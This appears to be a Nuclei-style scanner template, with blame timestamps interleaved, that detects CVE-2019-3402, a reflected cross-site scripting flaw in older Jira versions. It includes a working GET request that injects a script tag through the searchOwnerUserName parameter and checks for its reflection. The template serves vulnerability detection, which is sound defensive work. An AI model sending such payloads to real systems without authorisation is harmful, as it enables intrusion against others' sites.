2021-01-02 04:59:06 +00:00
id : CVE-2019-3402
2020-11-06 10:28:11 +00:00
info :
name : Jira - Reflected XSS using searchOwnerUserName parameter.
author : pdteam
severity : medium
2022-04-22 10:38:41 +00:00
description : The ConfigurePortalPages.jspa resource in Jira before version 7.13.3 and from version 8.0.0 before version 8.1.1 allows remote attackers to inject arbitrary HTML or JavaScript via a cross site scripting
(XSS) vulnerability in the searchOwnerUserName parameter.
reference :
- https://gist.github.com/0x240x23elu/891371d46a1e270c7bdded0469d8e09c
2021-09-10 11:26:40 +00:00
classification :
cvss-metrics : CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
2022-04-22 10:38:41 +00:00
cvss-score : 6.1
2021-09-10 11:26:40 +00:00
cve-id : CVE-2019-3402
cwe-id : CWE-79
2022-04-22 10:38:41 +00:00
tags : cve,cve2019,atlassian,jira,xss
2020-11-06 10:28:11 +00:00
requests :
- method : GET
path :
2021-06-09 18:31:38 +00:00
- "{{BaseURL}}/secure/ConfigurePortalPages!default.jspa?view=search&searchOwnerUserName=%3Cscript%3Ealert(1)%3C/script%3E&Search=Search"
2020-11-06 10:28:11 +00:00
matchers-condition : and
matchers :
- type : status
status :
- 200
- type : word
words :
- "<script>alert(1)</script>"
part : body